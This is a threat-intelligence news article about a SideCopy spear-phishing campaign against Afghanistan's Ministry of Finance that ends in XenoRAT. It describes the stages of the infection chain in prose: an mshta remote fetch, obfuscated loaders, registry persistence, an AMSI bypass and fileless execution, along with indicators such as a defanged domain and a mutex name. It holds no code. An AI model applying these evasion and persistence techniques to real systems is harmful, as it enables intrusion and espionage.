Threat Actor SideCopy Targets Afghanistan’s Ministry of Finance with Spear-Phishing Campaign
A sophisticated spear-phishing campaign linked to the Pakistan-based threat actor known as SideCopy has emerged, specifically targeting the Ministry of Finance (MoF) of Afghanistan. This operation is intricately designed to affect all 34 provincial revenue directorates, falling under the broader umbrella of the Transparent Tribe (APT36).
According to detailed threat intelligence reports from Seqrite, this malicious campaign eventually deploys a customized version of XenoRAT, specifically the 1.8.7 implant. This malware is engineered to beacon communication to a bulletproof European infrastructure, indicating strategic planning and operational sophistication on the part of the attackers.
The attack sequence initiates with the delivery of a ZIP archive that contains a harmful LNK file. The filename is not arbitrary; it has been meticulously crafted in Pashto, the official language of Afghanistan. The translation reads “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar.” Such attention to linguistic detail implies that the threat actor possesses an intimate understanding of the target’s environment, specifically its governmental operatives and provincial finance officials.
Upon execution of the attack, the malware generates a decoy document consisting of an extensive directory of provincial staff. This directory encompasses all 34 provinces and includes listings for Finance Directors, Revenue Chiefs, along with direct mobile numbers, presented in both Dari and Pashto. This level of detail strongly suggests that the threat actor engaged in thorough reconnaissance prior to the launch of the campaign, underscoring the operational seriousness behind this intrusion.
The campaign is characterized by a complex infection chain, skillfully designed to minimize digital footprints and evade detection across multiple layers of security. Key stages involved in this deployment include a series of processes that skillfully manipulate various system functions:
-
The LNK file utilizes mshta.exe as a Living-off-the-Land Binary (LOLBIN), fetching a remote HTA payload from a compromised Afghan education domain, specifically abimj[.]edu[.]af.
-
The following stage involves delivering a heavily obfuscated JScript payload. This payload is laced with hex-encoded string arrays and encompasses a custom Base64 decoding routine to facilitate the loading of a malicious Loader DLL.
-
The third stage introduces a .NET DLL that not only drops a decoy PDF but also establishes persistence within the system’s registry under a typosquatting entry labeled “Edgre” to closely resemble Microsoft Edge.
-
A second .NET shellcode loader subsequently downloads a payload (ayui.vmxx) and reconstructs it entirely in memory by employing functions like VirtualAlloc() and CreateThread().
- Finally, the malicious software modifies AmsiScanBuffer() in order to disable AMSI scanning, before utilizing Assembly.Load for fully reflective, fileless execution in memory.
Ultimately, this elaborate sequence of actions culminates in the deployment of XenoRAT 1.8.7, which establishes a connection to a command-and-control (C2) server over TCP, utilizing AES-encrypted and RTL-compressed traffic for stealthy communication.
SideCopy also imposes single-instance execution on compromised systems through a hardcoded mutex named “clouda.” Once successfully executed, XenoRAT equips the attackers with a robust post-exploitation toolkit, enabling functionalities like keylogging, screen capture, webcam surveillance, and SOCKS5 network tunneling. Such capabilities greatly enhance the threat actor’s ability to infiltrate and manipulate their target systems.
Seqrite has noted that this adoption of XenoRAT marks a strategic shift for SideCopy, which appears to be moving towards the use of tailored open-source malware following previous campaigns that leveraged AsyncRAT. This deliberate staging aligns malicious traffic alongside legitimate Afghan government assets, efficiently routing the delivery domain to AS58469.
Moreover, the Rat C2 server employs a Frankfurt-based bulletproof service provider that has been associated with other SideCopy operational infrastructure clusters. This indicates a well-established ecosystem that supports their illicit activities, further complicating the cybersecurity landscape in the region.
In response to this alarming development, it is imperative for Afghanistan’s government agencies to bolster their cybersecurity measures. Awareness and training among employees, coupled with stringent email filtering protocols, can serve as primary defensive barriers against such sophisticated spear-phishing attacks.
As the cyber threat landscape continues to evolve, understanding the tactics employed by groups like SideCopy is crucial for both government institutions and private sector organizations operating within vulnerable environments. Continuous monitoring and adaptive defense strategies will be essential in mitigating the risks posed by orchestration of such complex cyberattacks.